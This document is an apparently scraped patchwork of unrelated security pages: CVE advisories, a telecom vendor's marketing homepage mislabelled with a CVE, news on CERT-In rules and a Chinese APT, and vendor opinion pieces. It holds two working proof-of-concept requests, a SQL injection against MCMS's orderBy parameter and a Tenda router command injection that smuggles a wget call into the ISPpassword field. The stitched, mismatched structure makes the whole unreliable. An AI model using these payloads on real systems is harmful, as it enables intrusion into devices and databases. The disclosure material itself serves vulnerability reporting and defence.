A vulnerability in the Security Intelligence feed feature of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass the Security Intelligence DNS feed. This vulnerability is due to incorrect feed update processing. An attacker could exploit this vulnerability by sending traffic through an affected device that should be blocked by the affected device. A successful exploit could allow the attacker to bypass device controls and successfully send traffic to devices that are expected to be protected by the affected device.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following table(s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability described in this advisory and which release included the fix for this vulnerability.
    
    Cisco FTD Software Release
    
    First Fixed Release for This Vulnerability
    
    6.2.2 and earlier1
    
    Migrate to a fixed release.
    
    6.2.3
    
    Not vulnerable.
    
    6.3.01
    
    Migrate to a fixed release.
    
    6.4.0
    
    6.4.0.15
    
    6.5.01
    
    Migrate to a fixed release.
    
    6.6.0
    
    6.6.5.2
    
    6.7.0
    
    Migrate to a fixed release.
    
    7.0.0
    
    7.0.2 (May 2022)
    
    7.1.0
    
    Not vulnerable.
    
    1\. Cisco FMC and FTD Software releases 6.2.2 and earlier, as well as releases 6.3.0 and 6.5.0, have reached end of software maintenance. Customers are advised to migrate to a supported release that includes the fix for this vulnerability.
    
    For instructions on upgrading your FTD device, see Cisco Firepower Management Center Upgrade Guide.
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

CVE-2022-20730: Cisco Security Advisory: Cisco Firepower Threat Defense Software Security Intelligence DNS Feed Bypass Vulnerability

The Java Remote Management Interface of all versions of SVI MS Management System was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.

*   **A UNIFIED SIGNALLING PLATFORM**
    
    **A smart centralised signalling platform that unifies all mediation, routing and interworking, security and measurement between multi-generation networks.**
    
*   **ROUTING AND INTERWORKING**
    
    **Sigla’s smart signalling platform brings agility via a flexible routing and interworking engine that seamlessly traverses legacy and next-generation networks.**
    
*   **MEDIATION**
    
    **A centralised operating platform that manages all mediation processes between OCS, OSS/BSS and BI resources across multi generation networks.**
    
*   **SECURE BY DESIGN**
    
    **A powerful tool in the prevention of telecoms network fraud, enabling operators to counter a full range of threats and rapidly provision measures to counter emerging threats, guaranteeing the integrity of multi-generation networks.**
    
*   **MANAGEMENT INFORMATION SYSTEM**
    
    **Providing operators with a centralised Management Information System (MIS) from where they can curate, analyse and monitor data across all networks.**
    

*   A UNIFIED SIGNALLING PLATFORM
*   ROUTING AND INTERWORKING
*   MEDIATION
*   SECURE BY DESIGN
*   MANAGEMENT INFORMATION SYSTEM

**The Signalling Specialists to the Telecoms Industry**

**Sigla brings a homogenous layer to the management and operation of multi-generation networks, freeing operators from the burden of managing multiple core networks, and reducing network complexity and operating costs. **

**Why Customers Choose Squire Technologies**

**Expertise**

Over twenty years of specialist signalling interworking expertise and an enviable reputation for solving complex networking challenges.

**Converged**

Converged platforms and services for managing signalling and routing, network fraud and messaging across multi-protocol networks.

**Agility**

Solutions designed to scale and adapt to your network demand and provide an environment where you can innovate and drive growth.

**Savings**

Solutions that help operators to make savings on capex and reduce opex with flexible deployment options and managed services.

**

Integrating an OCS to Facilitate Policy and Billing Across Multi-generation Networks  


**

Squire Technologies Interworking Function makes OCS system integration with the core network seamless across multi-generation networks. The IWF provides forward and backward compatibility as signalling traverses multiple networks, with comprehensive protocol support for legacy 3G CAMEL, 4G / LTE Diameter, and 5G Nchf / HTTP2 protocols and more.

**

Diameter Signalling Controller

**

The Diameter Signalling Controller (DSC) provides a carrier grade signalling product delivering any combination of routing (DRA), interworking (IWF) and network edge (DEA) functionality.

**Diameter Edge Agent**

Diameter Edge Agent for  
secure exchange of authentication, authorisation and subscriber policy across LTE networks. 

**Diameter Routing Agent**

Diameter Routing Agent for scalable centralised routing of Diameter messages in a multivendor, multi node environment within a service providers IMS core.

**Interworking Function**

Interworking Function provides seamless interop between legacy and NGN, such as Diameter to SS7 CAMEL, MAP, RADIUS, 5G Nchf and more.

**

Messaging Platform

**

With the continuing growth of A2P SMS traffic the SVI-SMSC offers not only an out-of-the-box, feature rich, carrier grade solution, but with innovative service logic technology it allows clients to rapidly provision new revenue generating value added services.

**

Solutions for MVNO's  
Migrating from Light to Full MVNO

**

Here at Squire Technologies we provide MVNO's with a clear roadmap to Full MVNO status, helping them to minise Capex, utilise manage services to reduce Opex and build agile networks using flexible core network products.

**

Fraud Prevention Solutions

**

MavenShield provides mobile operators with a highly flexible tool in the fight against network fraud, helping them to identify fraudulent behaviour and take proactive measures to reduce it across multi-generation networks.

Bypass Fraud | CLI Spoofing | Wangiri Fraud | IRSF Fraud | Account Takeover Sim Box Fraud | PBX Fraud | Smishing Fraud | SIM Swap Fraud etc...

**

Squire Technologies Combine Cutting Edge Signalling Interworking Technology with Proven Carrier-Grade Network Products.

**

**

Trusted by Customers Worldwide

**

**Squire Technologies solutions enable over 30 billion transactions per second and 11 trillion transactions per year. We have deployments in over 6 continents, in 150+ countries and with 400+ customers. **

30

**Transactions per second**

**Our Customers are at the Heart of our Organization**

**

Latest News and Media  


**

News | Opinion | Intelligence | Press Releases | Updates

**Supporting Calian in Delivering Mission Critical Transport Signalling**

Satellite communications experts Calian have been at the cutting edge of advanced technologies for over five decades. They are global leaders in providing sophisticated solutions that support mission critical space and satellite applications for communications...

**SMS is Here to Stay and 5G isn’t Going to Change That**

As with all major technology advancements there’s plenty of debate and prophecy on how it’s likely to impact existing tech and bring about the demise of old ways, none-more-so than with 5G. Various commentators and presentations during events (when...

**Intellico Implements Squire Technologies Signalling and Messaging Platform**

Innovative SMS boutique Intellico has implemented Squire Technologies multi-generation signalling and messaging platform to enable operators to communicate with their customers. The solution from Squire Technologies provides state-of-the-art SMSC functionality...

**

The Future of Rural Networks is Multi-Generational

**

Kelly Hill from RCR Wireless asks Squire Technologies CEO Sanjeev Verma about the challenges that telecoms operators face with connecting rural areas.

CVE-2020-23621: Squire Technologies - Home

Links may not be rewritten according to policy in some specially formatted emails.

Uncover the highly evasive adaptive threats (HEAT) causing ransomware attacks.

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

*   Why Menlo
    
    **Why Menlo**
    
    Traditional security approaches are flawed, costly, and overwhelming for security teams. Menlo Security is different. It’s the simplest, most definitive way to secure work—making online threats irrelevant to your users and your business.
    
    Why Menlo
    
*   Products
    
    **Products**
    
    *   Products Overview
    *   Secure Web Gateway
    *   Remote Browser Isolation
    *   Email Isolation
    *   CASB
    *   DLP
    *   Menlo Private Access
    *   Cloud Firewall
    *   Isolation Security Operations Center
    
*   Solutions
    
    **Solutions**
    
    *   Solutions Overview
    *   Eliminate phishing & ransomware
    *   Seamless ransomware prevention
    *   Gain visibility & control over data loss
    *   Control access to SaaS applications
    *   Implement Secure Access Service Edge (SASE)
    *   Secure access to private applications
    *   Secure Microsoft 365 & Google Workspace
    *   Secure remote work
    *   Mobile malware prevention
    *   Virtual network separation
    *   Neutralize malicious document downloads
    *   Migrate on-premise proxy to Cloud SWG
    
*   Resources
    
    **Threat intelligence is on tap at Menlo Labs**
    
    Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise. The collective is made up of elite security researchers that put a spotlight on the threats you know and don’t know about.
    
    Learn More
    
*   About
    
    **Company**
    
    *   About Us
    *   Management Team
    *   Board of Directors
    *   Investors
    *   Customers
    *   Partners
    *   Technology Partners
    *   Contact Us
    

*   Demo

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

****  
CVE ID: CVE-2022-24974****

Product: Email Isolation On-Premise  
Affected versions: 2.81.1 – 2.81.8  
Fixed in 2.81.9+  
Description: “Links may not be rewritten according to policy in some specially formatted emails.”  
Reported by: Anonymous

CVE-2022-24974: Published security vulnerabilities - Menlo Security

CERT-In updates cybersecurity rules to include mandatory reporting, record-keeping, and more.

The Indian Computer Emergency Response Team (CERT-In) issued new cyber incident reporting guidelines, including the requirement for service providers, intermediaries, data centers, corporations, and government agencies to report cyber incidents to the regulator within six hours.

The new government-issued cybersecurity rules will take effect in 60 days.

Incidents requiring immediate CERT-In notification include:

*   Targeted scanning/probing of critical networks/systems
*   Compromise of critical systems/information
*   Unauthorized access of IT systems/data
*   Defacement of website or intrusion into a website and unauthorized changes such as inserting malicious code, links to external websites, etc.
*   Malicious code attacks such as spreading of virus/ worm/ Trojan/ bots/ spyware/ ransomware/ cryptominers
*   Attack on servers such as database, mail, and DNS, and network devices such as routers
*   Identity theft, spoofing, and phishing attacks
*   Denial of service (DoS) and distributed denial of service (DDoS) attacks
*   Attacks on critical infrastructure, SCADA and operational technology systems, and wireless networks
*   Attacks on applications such as e-governance, e-commerce, etc.
*   Data breach
*   Data leak
*   Attacks on Internet of Things (IoT) devices and associated systems, networks, software, and servers
*   Attacks or incident affecting digital payment systems
*   Attacks through malicious mobile apps
*   Fake mobile apps
*   Unauthorized access to social media accounts
*   Attacks or malicious/ suspicious activities affecting cloud computing systems/ servers/ software/ applications
*   Attacks or malicious/suspicious activities affecting systems/ servers/ networks/ software/ applications related to big data, blockchain, virtual assets, virtual asset exchanges, custodian wallets, robotics, 3D and 4D printing, additive manufacturing, and drones
*   Attacks or malicious/ suspicious activities affecting systems/ servers/software/ applications related to artificial intelligence and machine learning

Other new rules require service providers and their intermediaries, data centers, corporations, and government agencies to connect to the Network Time Protocol (NTP) server of the National Informatics Center (NIC) or National Physical Laboratory (NPL) — or with servers that can be traced back to one of those two servers — and synchronize their ICT system clocks with the government's.

These organizations will also need to start keeping logs for the previous 180 days and provide it to CERT-In if an incident occurs, the new guidelines said.

The tightening up of reporting rules is intended to close "certain gaps causing hinderance in incident analysis," the Ministry of Electronics & IT said in its statement announcing the new cybersecurity measures. "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Regulations in India Require Orgs to Report Cyber Incidents Within 6 Hours

MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don’t work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves. 
For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.
The reason? In 2010,

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don't work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves.

For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.

The reason? In 2010, just under 5000 CVEs were recorded in the MITRE vulnerabilities database. By 2021, the yearly total had skyrocketed to over 20,000. Today, software and network integrity are synonymous with business continuity. And this makes the issue of which vulnerabilities to address first mission-critical. Yet owing to the countless documented vulnerabilities lurking in a typical enterprise ecosystem – across thousands of laptops, servers, and internet-connected devices – less than one in ten actually needs to be patched. The question is: how can we know which patches will ensure that our sieve doesn't sink?

This is why more and more companies are turning to Vulnerability Prioritization Technology (VPT). They seek solutions that filter out the flood of false positives generated by legacy tools and poorly-configured solutions and address only those vulnerabilities that directly affect their networks. They're leaving traditional vulnerability management paradigms behind and shifting to the next generation of VPT solutions.

****The Evolution of Vulnerability Management****

It's not news that even the most resource-rich enterprise can't possibly sort through, prioritize and patch every single vulnerability in their ecosystem. That's why the shift toward VPT started in the first place.

Initially, Vulnerability Management (VM) focused on scanning and detecting core networks for any vulnerabilities. This was known as Vulnerability Assessment (VA), and the deliverable was a massively long list of vulnerabilities that had little practical value for already overextended IT resources.

To make VA more actionable, the next generation of VM tools included vulnerability prioritization based on each vulnerability's global CVE scoring. This was further refined by adding another layer of prioritization based on estimations of potential damage, threat context, and, ideally, a correlation with local context to evaluate the potential business impact based on DREAD type models. This more advanced approach is known as Risk Based Vulnerability Management (RBVM) and was a giant leap forward from VA.

Yet even advanced VM tools implementing RBVM lag behind in sophistication and actionability. These tools can only detect what they know – meaning that misconfigured detection tools frequently result in missed attacks. They cannot evaluate whether security controls are configured to compensate for the severity of a given vulnerability according to its CVE score correlated with local context risk. This still results in bloated patching lists and also means that - just like with early-gen VA tools - patching often ends up at the bottom of the to-do list or is simply ignored by IT teams.

****Leveraging Next-Gen VPT****

Advanced VPT solutions are the next generation of VM – offering organizations a very different view of their unique cyber risks.

Building on traditional VA detection and more advanced RBVM capabilities, the latest generation of VPT solutions adds asset criticality context, environmental context, and multiple, pre-integrated threat intelligence sources. In this way, it effectively augments vulnerability severity data with sophisticated analytics and in-context applicability. These analytical capabilities enable advanced VPT solutions to integrate highly granular threat validation – creating the next generation of capabilities that augment traditional VM: Attack Based Vulnerability Management (ABVM).

ABVM is a game-changer. Because once network stakeholders are able to effectively validate the real-world threats facing their networks, they can test their environments based on actual exposure levels and permeability to attack. According to Gartner, the shift towards ABVM is crucial to better prioritization and assessment of vulnerabilities. It empowers security and risk management leaders to both generate recommendations and apply them directly to their security programs – addressing prioritized findings.

Leveraging ABVM, security stakeholders can identify _all_ undetected attacks, generate data and use cases that enable continuous improvement of detection and response tool configuration, and map out potential end-to-end attack paths with detailed local context. Once these yet unsecured attack paths are clearly mapped out, patching is too because threat validation coupled with a deep understanding of attack paths enables laser-focused patching prioritization. With ABVM, optimizing scarce patching resources to plug only those holes that threaten to sink the sieve becomes straightforward.

The move from traditional score-based VA or RBVM approaches to ABVM can lower patching load by 20%-50% while markedly improving overall security posture. By preventing security drift, ABVM also helps streamline SIEM toolsets – improving tool configuration, eliminating overlap, and identifying missing capabilities.

****The Bottom Line****

By improving security, reducing costs, refining resource allocation, and strengthening collaboration between teams, ABVM offers a new horizon of productivity and efficacy for security teams. Taking traditional VPT to the next level, ABVM solves chronic vulnerability patching overload, enabling networks to remain afloat even in today's threat-choked waters.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Which Hole to Plug First? Solving Chronic Vulnerability Patching Overload

A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.
"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.
"The target of this attack is currently unknown but with high

A Chinese state-sponsored espionage group known as **Override Panda** has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.

"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.

"The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

Override Panda, also called Naikon, Hellsing, and Bronze Geneva, is known to operate on behalf of Chinese interests since at least 2005 to conduct intelligence-gathering operations targeting ASEAN countries.

Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malware.

Last April, the group was linked to a wide-ranging cyberespionage campaign directed against military organizations in Southeast Asia. Then in August 2021, Naikon was implicated in cyberattacks targeting the telecom sector in the region in late 2020.

The latest campaign spotted by Cluster25 is no different in that it leverages a weaponized Microsoft Office document to kick-start the infection killchain that includes a loader designed to launch a shellcode, which, in turn, injects a beacon for the Viper red team tool.

Available for download from GitHub, Viper is described as a "graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration."

The framework, similar to Cobalt Strike, is said to feature over 80 modules to facilitate initial access, persistence, privilege escalation, credential Access, lateral movement, and arbitrary command execution.

"By observing Naikon APT's hacking arsenal, it was concluded that this group tends to conduct long-term intelligence and espionage operations, typical for a group that aims to conduct attacks on foreign governments and officials," the researchers pointed out.

"To avoid detection and maximize the result, it changed different \[tactics, techniques, and procedures\] and tools over time."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese "Override Panda" Hackers Resurface With New Espionage Attacks

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting 'remote everything'.

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting ‘remote everything’.

The rise of remote work and learning opened new opportunities for many people – as we’ve seen by the number of people who have moved to new places or adapted to “workcations.” Cybercriminals are taking advantage of the same opportunities – just in a different way. Evaluating the prevalence of malware variants by region reveals a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector.

****What Malware Trends are Showing****

Our FortiGuard Labs research team dug into the prevalence of malware variants by region for the second half of 2021. What they found shows a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector. The team found that various forms of browser-based malware were prevalent. Often, this takes the form of phishing lures or scripts that inject code or redirect users to malicious sites.

Detections vary across regions, of course, but can be largely grouped into three broad distribution mechanisms: Microsoft Office executables (MSExcel/, MSOffice/), PDF files and browser scripts (HTML/, JS/). Files packed with the Microsoft Intermediate Language (MSIL) are another common feature.

It’s worthy of note that some kinds of browser-based malware occupy the top spots in all regions. Such techniques have gained prominence recently as a way to exploit peoples’ desire for the latest news about COVID-19, politics, sports or any current headline. And since many are browsing from their home networks these days, there are fewer layers of protection between such malware and would-be victims (e.g., no corporate web filters).

****The Rise of Exploit Kits****

The use of exploit kits (EKs) is one element that has clearly helped cybercriminals in their efforts to execute malware. These kits are automated programs attackers use to exploit systems or applications. What makes an exploit kit very dangerous is its ability to identify victims while they browse the web. After they target a potential victim’s vulnerabilities, attackers can download and execute their malware of choice.

Exploit kits work automatically and silently as they look for vulnerabilities on a user’s machine while they browse the web. Currently, exploit kits are the preferred method for the distribution of remote access tools (RATs) or mass malware by cybercriminals, especially those seeking to profit financially from an exploit.

What’s especially insidious is that EKs don’t require victims to download a file or attachment. The victim need only browse on a compromised website, and then that site pulls in hidden code that attacks vulnerabilities in the user’s browser.

Currently, older kits are available to the public. Attackers have been taking these older kits and modifying them, making them more resilient to newer security detection strategies. Also, many of these kits are being advertised for sale online. Attackers offer these kits for rent on these sites and offer support and update contracts to guarantee they work against future updates.

****Addressing the Remote Everything Security Problem****

As hybrid work and learning become embedded paradigms in our culture, there are fewer layers of protection between malware and would-be victims. And bad actors are gaining access to more tools to help them pull off their nefarious deeds – like exploit kits. At the same time, the attack surface has rapidly expanded and continues to do so.

That means enterprises must take a work-from-anywhere approach to their security. They need to deploy solutions capable of following, enabling and protecting users no matter where they are located. They need security on the endpoint (EDR) combined with zero trust network access (ZTNA) approaches.

Another vital component and best practice of modern security strategy is the development of a holistic security mesh, wherein fully integrated security, services and threat intelligence seamlessly follow users on the road, at home or in the office to provide enterprise-grade protection and productivity across the extended network.

This simplifies and satisfies the demands of today’s three most common WFA scenarios: the corporate office, the home office and the mobile worker. Enterprises must secure mission-critical applications, so securing access to those applications, the networks to connect to those applications, and the devices that run those applications remain a vital component of a layered defense – even when working from a traditional location.

In the home office, risk lurks in the home networks that are often poorly secured with retail wireless routers and contain vulnerable IoT devices, which can be a pathway for hacker to gain access. And mobile workers regularly rely on untrusted and unsecured networks to access critical business resources. This can introduce unique threats, enabling cybercriminals to launch attacks against inadequately protected devices or intercept exposed communications.

A holistic integration of endpoint security, network security and ZTA/ZTNA addresses the challenges that WFA presents.

Criminals will make the most of any possible threat scenario, and the past two years have provided many opportunities for network attack. Malware trends and the rise of exploit kits have proven this point, and it’s now incumbent upon IT security teams to re-evaluate their security posture and adjust as needed. A comprehensive, integrated security mesh that accounts for all work possibilities is a best practice.

**_Aamir Lakhani is cybersecurity researcher and practitioner at FortiGuard Labs_.**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Tag

#intel